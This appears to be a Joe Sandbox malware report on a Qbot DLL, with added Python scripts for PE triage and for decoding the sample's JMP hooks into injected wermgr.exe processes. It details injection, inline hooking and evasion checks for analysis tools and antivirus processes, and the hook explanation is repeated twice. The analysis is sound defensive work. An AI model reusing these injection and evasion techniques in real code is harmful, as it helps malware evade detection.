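```python
"""Static PE triage for the properties the report flags: entry point outside
a code section, non-standard section names, a high-entropy section, an import
directory that lists no functions, and an overlay. Added example, not Joe
Sandbox code; build_sample_pe() is a constructed stand-in for the sample."""
import hashlib
import math
import struct
from collections import Counter

FILE_ALIGN, SECT_ALIGN = 0x200, 0x1000
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".idata", ".edata", ".pdata",
                     ".rsrc", ".reloc", ".bss", ".tls", ".CRT"}
CODE_SECTIONS = {".text", "CODE"}


def build_sample_pe():
    """Constructed PE32 DLL: entry point in .data (high entropy), sections
    .reloc6s and .hata, an empty import descriptor table, overlay appended."""
    text = b"\xC3" * FILE_ALIGN                                          # flat entropy
    data = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(FILE_ALIGN // 32))
    bodies = [(b".text", text, 0x60000020), (b".data", data, 0xC0000040),
              (b".reloc6s", bytes(FILE_ALIGN), 0x42000040), (b".hata", bytes(FILE_ALIGN), 0x40000040)]
    headers_size = 0x200                  # 64 + 4 + 20 + 224 + 4*40 = 472 bytes, padded
    entry_rva = 2 * SECT_ALIGN + 0x10     # inside .data, not .text
    import_rva = 4 * SECT_ALIGN           # start of .hata: a single all-zero descriptor
    sect_hdrs, raw, rva, ptr = b"", b"", SECT_ALIGN, headers_size
    for name, body, flags in bodies:
        sect_hdrs += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(body), rva, len(body), ptr, 0, 0, 0, 0, flags)
        raw += body
        rva += SECT_ALIGN
        ptr += len(body)
    dirs = [(0, 0)] * 16
    dirs[1], dirs[12] = (import_rva, 20), (import_rva + 0x100, 8)       # IMPORT and IAT present
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 14, 0, len(text), 3 * FILE_ALIGN, 0, entry_rva, SECT_ALIGN, 2 * SECT_ALIGN,
                      0x10000000, SECT_ALIGN, FILE_ALIGN, 6, 0, 0, 0, 6, 0, 0, rva, headers_size, 0,
                      2, 0x140,                                           # GUI; DYNAMIC_BASE | NX_COMPAT
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    coff = struct.pack("<HHIIIHH", 0x14C, len(bodies), 0, 0, 0, len(opt), 0x2102)   # i386, DLL
    dos = b"MZ" + bytes(58) + struct.pack("<I", 64)                     # e_lfanew = 64
    headers = (dos + b"PE\0\0" + coff + opt + sect_hdrs).ljust(headers_size, b"\0")
    return headers + raw + b"constructed overlay bytes"


def parse_pe(data):
    """Entry point, DllCharacteristics, data directories and section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsect, = struct.unpack_from("<H", data, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", data, e_lfanew + 20)
    opt = e_lfanew + 24
    magic, = struct.unpack_from("<H", data, opt)
    dir_off = opt + (112 if magic == 0x20B else 96)   # PE32+: 8-byte ImageBase, no BaseOfData
    entry, = struct.unpack_from("<I", data, opt + 16)
    dllchar, = struct.unpack_from("<H", data, opt + 70)
    ndirs, = struct.unpack_from("<I", data, dir_off - 4)
    dirs = [struct.unpack_from("<II", data, dir_off + 8 * i) for i in range(min(ndirs, 16))]
    sections = []
    for i in range(nsect):
        name, vsize, va, rsize, rptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va, "vsize": vsize,
                         "rptr": rptr, "rsize": rsize, "raw": data[rptr:rptr + rsize]})
    return {"entry": entry, "dllchar": dllchar, "dirs": dirs, "sections": sections}


def rva_to_offset(pe, rva):
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rsize"]):
            return s["rptr"] + (rva - s["va"])
    return None


def entropy(buf):
    """Shannon entropy in bits per byte (0.0 for uniform bytes, 8.0 for a flat histogram)."""
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values()) if n else 0.0


def count_imports(data, pe):
    """(modules, functions) the import directory lists, or None without one.
    Walks IMAGE_IMPORT_DESCRIPTORs (20 bytes each) to the all-zero terminator."""
    rva = pe["dirs"][1][0] if len(pe["dirs"]) > 1 else 0
    off = rva_to_offset(pe, rva) if rva else None
    if off is None:
        return None
    modules = functions = 0
    while True:
        oft, _, _, name_rva, ft = struct.unpack_from("<IIIII", data, off)
        if not (oft or name_rva or ft):
            break
        modules += 1
        thunk = rva_to_offset(pe, oft or ft)
        while thunk is not None and struct.unpack_from("<I", data, thunk)[0]:
            functions += 1
            thunk += 4
        off += 20
    return modules, functions


def triage(data):
    pe = parse_pe(data)
    findings = []
    ep = next((s for s in pe["sections"]
               if s["va"] <= pe["entry"] < s["va"] + max(s["vsize"], s["rsize"])), None)
    if ep is None:
        findings.append("entry point lies outside every section")
    elif ep["name"] not in CODE_SECTIONS:
        findings.append(f"entry point lies in {ep['name']}, not a code section")
    for s in pe["sections"]:
        if s["name"] not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name {s['name']}")
        h = entropy(s["raw"])
        if h > 7.0:
            findings.append(f"high entropy in {s['name']}: {h:.2f}")
    imports = count_imports(data, pe)
    if imports is None:
        findings.append("no import directory")
    elif imports[1] == 0:
        findings.append("import directory present but no functions imported")
    end = max(s["rptr"] + s["rsize"] for s in pe["sections"])
    if len(data) > end:
        findings.append(f"overlay: {len(data) - end} bytes appended after the last section")
    return findings


if __name__ == "__main__":
    for line in triage(build_sample_pe()):
        print(line)
```

On the constructed image this reports six findings, matching the six static observations above. The import walk is what separates "no import directory" from the report's actual case, a directory that exists but lists nothing: a loader that resolves its own imports at runtime (the sample's 3_2_0316EF38 calls LoadLibraryA and GetProcAddress) needs no static import table, so an empty one on a DLL that clearly does work is itself the signal.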

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 5988 base: 983C50 value: E9 42 26 2E 02
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 5996 base: 983C50 value: E9 42 26 3C 02
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6004 base: 983C50 value: E9 42 26 03 02
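Each of the three records above is a 5-byte near JMP (opcode E9 followed by a little-endian signed rel32) written at the same address, 0x983C50, in a different target process; this is the inline hook behind the "Overwrites code with unconditional jumps" signature. The target of such a jump is base + 5 + rel32, and carrying that arithmetic through lands every one of the three patches at offset 0x6297 inside the unpacked image the Qbot Yara rules matched in the three wermgr.exe processes (0x2C60000, 0x2D40000, 0x29B0000 for report processes 7, 8 and 9). The script below is an added example, not Joe Sandbox code: it parses the three record lines as copied from the report, decodes the displacement and resolves the target against that region table. Picking the nearest image base at or below the target, and the 1 MiB sanity cap on the distance, are my assumptions; the report does not give region sizes, and it does not say which module or function sits at 0x983C50, only that the same address is patched in all three processes.

```python
"""Decode the three JMP rel32 patches the report records under "Memory
written" and resolve where each lands. Added example, not Joe Sandbox code;
the record lines are copied from the report, the region table from its
Yara matches, and the nearest-base lookup is an assumption."""
import re
import struct

MEMORY_WRITES = [
    "Source: C:\\Windows\\SysWOW64\\regsvr32.exe Memory written: PID: 5988 base: 983C50 value: E9 42 26 2E 02",
    "Source: C:\\Windows\\SysWOW64\\rundll32.exe Memory written: PID: 5996 base: 983C50 value: E9 42 26 3C 02",
    "Source: C:\\Windows\\SysWOW64\\rundll32.exe Memory written: PID: 6004 base: 983C50 value: E9 42 26 03 02",
]

# Unpacked-PE regions the Qbot Yara rules matched in the three wermgr.exe
# processes: report process number -> base of the injected image.
INJECTED_REGIONS = {7: 0x2C60000, 8: 0x2D40000, 9: 0x29B0000}

LINE_RE = re.compile(
    r"Source: (?P<writer>\S+) Memory written: PID: (?P<pid>\d+) "
    r"base: (?P<base>[0-9A-Fa-f]+) value: (?P<patch>[0-9A-Fa-f]{2}(?: [0-9A-Fa-f]{2})*)"
)


def parse_write(line):
    m = LINE_RE.search(line)
    if m is None:
        raise ValueError("not a Memory written record: " + line)
    return {"writer": m["writer"], "pid": int(m["pid"]),
            "base": int(m["base"], 16), "patch": bytes.fromhex(m["patch"])}


def decode_jmp_rel32(base, patch):
    """Target of an E9 rel32 near JMP written at `base`, or None if the bytes
    are not one. rel32 is a signed displacement from the end of the 5-byte
    instruction, so target = base + 5 + rel32, wrapped to 32 bits."""
    if len(patch) < 5 or patch[0] != 0xE9:
        return None
    rel32 = struct.unpack_from("<i", patch, 1)[0]
    return (base + 5 + rel32) & 0xFFFFFFFF


def locate(target, regions, max_size=0x100000):
    """(process, offset) for the region whose base is the nearest one at or
    below target, or None when no base lies within max_size below it."""
    below = {proc: b for proc, b in regions.items() if b <= target < b + max_size}
    if not below:
        return None
    proc = max(below, key=below.get)
    return proc, target - below[proc]


def resolve_hooks(lines=MEMORY_WRITES, regions=INJECTED_REGIONS):
    out = []
    for line in lines:
        rec = parse_write(line)
        target = decode_jmp_rel32(rec["base"], rec["patch"])
        hit = locate(target, regions) if target is not None else None
        out.append({"writer": rec["writer"], "pid": rec["pid"], "hook_at": rec["base"],
                    "target": target, "process": hit[0] if hit else None,
                    "offset": hit[1] if hit else None})
    return out


if __name__ == "__main__":
    for r in resolve_hooks():
        writer = r["writer"].split(chr(92))[-1]
        print(f"{writer} patched {r['hook_at']:#x} in PID {r['pid']}: JMP -> {r['target']:#010x} "
              f"= wermgr.exe process {r['process']} image + {r['offset']:#x}")
```

The three targets come out as 0x02C66297, 0x02D46297 and 0x029B6297: one hook per wermgr.exe, each redirecting the patched function into the payload that the same writer had just mapped into that process. Two checks are worth keeping in mind when reusing this: the hook address being identical across processes is consistent with a system DLL loaded at the same base in each of them (ASLR rebases once per boot, not per process), and a reported displacement that resolves outside every known injected region means either the region table is incomplete or the bytes are not a JMP at all, which is why decode_jmp_rel32 refuses anything that does not start with E9.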
          Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX (the same event is recorded 25 times across the rundll32.exe processes)
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE
Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SYSANALYZER.EXEN
Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PETOOLS.EXE,
Source: wermgr.exe, 00000009.00000003.256574110.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.256625217.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: WINDUMP.EXE+
Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROC_ANALYZER.EXE,
Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
Source: wermgr.exe, 00000009.00000003.256574110.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.256625217.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: TCPDUMP.EXE,
Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE*
Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IMPORTREC.EXE
Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXEL
Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PETOOLS.EXE
Source: wermgr.exe, 00000009.00000003.256574110.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.256625217.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: TCPDUMP.EXE
Source: wermgr.exe, 00000009.00000003.256574110.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.256625217.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: WINDUMP.EXE
Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE,
Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROC_ANALYZER.EXE
Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SNIFF_HIT.EXE
Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IMPORTREC.EXE,
Source: wermgr.exe, 00000009.00000003.256661385.0000000004AD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SYSANALYZER.EXE
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5908 | Thread sleep count: 135 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5960 | Thread sleep count: 106 > 30
Source: C:\Windows\SysWOW64\wermgr.exe TID: 5992 | Thread sleep count: 59 > 30
Source: C:\Windows\SysWOW64\wermgr.exe TID: 6000 | Thread sleep count: 41 > 30
Source: C:\Windows\SysWOW64\wermgr.exe TID: 6052 | Thread sleep time: -90000s >= -30000s
Source: C:\Windows\SysWOW64\wermgr.exe TID: 6064 | Thread sleep time: -135000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_4-14149
Source: C:\Windows\SysWOW64\regsvr32.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_3-13968
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_4-11544
Source: C:\Windows\SysWOW64\regsvr32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_3-11548
Source: C:\Windows\SysWOW64\regsvr32.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0316DDE7 GetSystemInfo,3_2_0316DDE7
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0316C123 FindFirstFileW,FindNextFileW,3_2_0316C123
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0346C123 FindFirstFileW,FindNextFileW,4_2_0346C123
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0316EF38 LoadLibraryA,GetProcAddress,3_2_0316EF38

          HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wermgr.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wermgr.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wermgr.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\wermgr.exe base: 2C90000
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\wermgr.exe base: 983C50
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\wermgr.exe base: 2D70000
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\wermgr.exe base: 983C50
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\wermgr.exe base: 29E0000
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\wermgr.exe base: 983C50
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: 2C90000 protect: page read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: 2D70000 protect: page read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: 29E0000 protect: page read and write
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\wermgr.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\wermgr.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0316A1F8 GetSystemTimeAsFileTime,3_2_0316A1F8
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0316DFC2 GetCurrentProcessId,GetLastError,GetSystemMetrics,GetVersionExA,GetWindowsDirectoryW,3_2_0316DFC2
Source: regsvr32.exe, 00000003.00000003.245712695.0000000004FAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.245952470.00000000050FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.246272113.0000000004DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: bdagent.exe
Source: regsvr32.exe, 00000003.00000003.245712695.0000000004FAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.245952470.00000000050FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.246272113.0000000004DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vsserv.exe
Source: regsvr32.exe, 00000003.00000003.245712695.0000000004FAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.245952470.00000000050FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.246272113.0000000004DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: avp.exe
Source: regsvr32.exe, 00000003.00000003.245712695.0000000004FAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.245952470.00000000050FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.246272113.0000000004DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: avgcsrvx.exe
Source: regsvr32.exe, 00000003.00000003.245712695.0000000004FAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.245952470.00000000050FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.246272113.0000000004DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mcshield.exe
Source: regsvr32.exe, 00000003.00000003.245712695.0000000004FAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.245952470.00000000050FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.246272113.0000000004DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: MsMpEng.exe
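The three "Memory written ... base: 983C50 value: E9 ..." lines in the hooking section above record the same 5-byte patch, an E9 (JMP rel32) opcode followed by a 32-bit displacement, at the same address in each wermgr.exe child, which is what the "Overwrites code with unconditional jumps" signature keys on. The HIPS section lists the regions the injectors allocated and wrote in those children, and the Yara sections give the bases of the unpacked Qbot images found in them (analysis IDs 7, 8 and 9). The following is an added example, not part of the Joe Sandbox report: it decodes each displacement into an absolute destination and checks whether that destination falls in one of the Yara-matched regions. The pairing of Windows PIDs 5988/5996/6004 with analysis IDs 7/8/9 that it reports is an inference from the addresses, not something the report states explicitly.

```python
import struct
from typing import List, NamedTuple, Optional

# Patches copied from the report's "Memory written" lines:
# (injecting process, target wermgr.exe PID, patch address, bytes written).
REPORTED_PATCHES = [
    ("regsvr32.exe", 5988, 0x983C50, bytes.fromhex("E9 42 26 2E 02")),
    ("rundll32.exe", 5996, 0x983C50, bytes.fromhex("E9 42 26 3C 02")),
    ("rundll32.exe", 6004, 0x983C50, bytes.fromhex("E9 42 26 03 02")),
]

# Bases of the Yara-matched wermgr.exe memory regions (from the .sdmp names in the report).
# The "Memory allocated" lines list read/write buffers 0x30000 above each of these.
YARA_REGIONS = {
    0x02C60000: "wermgr.exe analysis ID 7 (00000007.*.0000000002C60000.sdmp)",
    0x02D40000: "wermgr.exe analysis ID 8 (00000008.*.0000000002D40000.sdmp)",
    0x029B0000: "wermgr.exe analysis ID 9 (00000009.*.00000000029B0000.sdmp)",
}

ALLOC_GRANULARITY = 0x10000   # Windows reserves private memory on 64 KiB boundaries


class Hook(NamedTuple):
    injector: str
    target_pid: int
    patch_addr: int
    jump_target: int
    region_base: Optional[int]   # Yara region whose 64 KiB base matches the destination, if any
    region_label: str


def decode_jmp_rel32(patch_addr: int, patch: bytes) -> int:
    """Absolute destination of a 5-byte JMP rel32 (E9 xx xx xx xx) written at patch_addr.

    The CPU adds the signed little-endian rel32 to the address of the *next*
    instruction, i.e. patch_addr + 5. The result is masked to 32 bits because
    the patched wermgr.exe instances are SysWOW64 (32-bit) processes.
    """
    if len(patch) != 5 or patch[0] != 0xE9:
        raise ValueError(f"not a JMP rel32 at {patch_addr:#x}: {patch.hex()}")
    (rel32,) = struct.unpack("<i", patch[1:])
    return (patch_addr + 5 + rel32) & 0xFFFFFFFF


def attribute_hook(injector: str, target_pid: int, patch_addr: int, patch: bytes) -> Hook:
    """Decode one patch and map its destination onto a reported injected region."""
    target = decode_jmp_rel32(patch_addr, patch)
    base = target - (target % ALLOC_GRANULARITY)
    if base in YARA_REGIONS:
        return Hook(injector, target_pid, patch_addr, target, base, YARA_REGIONS[base])
    return Hook(injector, target_pid, patch_addr, target, None, "no Yara-matched region at this base")


def attribute_hooks() -> List[Hook]:
    return [attribute_hook(*patch) for patch in REPORTED_PATCHES]


if __name__ == "__main__":
    for h in attribute_hooks():
        where = (f"{h.region_label} + {h.jump_target - h.region_base:#x}"
                 if h.region_base is not None else h.region_label)
        print(f"{h.injector:<12} -> PID {h.target_pid}: JMP at {h.patch_addr:#010x} "
              f"lands at {h.jump_target:#010x} = {where}")
```

All three patches resolve to offset 0x6297 from a Yara-matched base: the same routine in three copies of the unpacked payload, each relocated to where that process happened to receive its allocation. The same decoding is worth running on any "Memory written" event whose first byte is E9 when triaging a report, since a 5-byte write is too short to be a payload and the destination tells you which region the hook hands control to.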

          Stealing of Sensitive Information

Source: Yara match | File source: 8.2.wermgr.exe.2d40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.wermgr.exe.2d40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.regsvr32.exe.3140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.rundll32.exe.4a40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.wermgr.exe.2c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.4a60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.3460000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.wermgr.exe.2d40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.wermgr.exe.2c60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.regsvr32.exe.3140000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.4a60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.regsvr32.exe.3160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.rundll32.exe.4a40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.wermgr.exe.2d40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.3460000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.wermgr.exe.29b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.wermgr.exe.29b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.wermgr.exe.2c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.regsvr32.exe.3160000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.wermgr.exe.2c60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.rundll32.exe.32e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.245679829.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.252174416.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.251843249.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.245541502.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.254770959.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.251930910.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.252831702.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.246084770.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.254795791.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

Source: Yara match | File source: 8.2.wermgr.exe.2d40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.wermgr.exe.2d40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.regsvr32.exe.3140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.rundll32.exe.4a40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.wermgr.exe.2c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.4a60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.3460000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.wermgr.exe.2d40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.wermgr.exe.2c60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.regsvr32.exe.3140000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.4a60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.regsvr32.exe.3160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.rundll32.exe.4a40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.wermgr.exe.2d40000.0.unpack, type: UNPACKEDPE
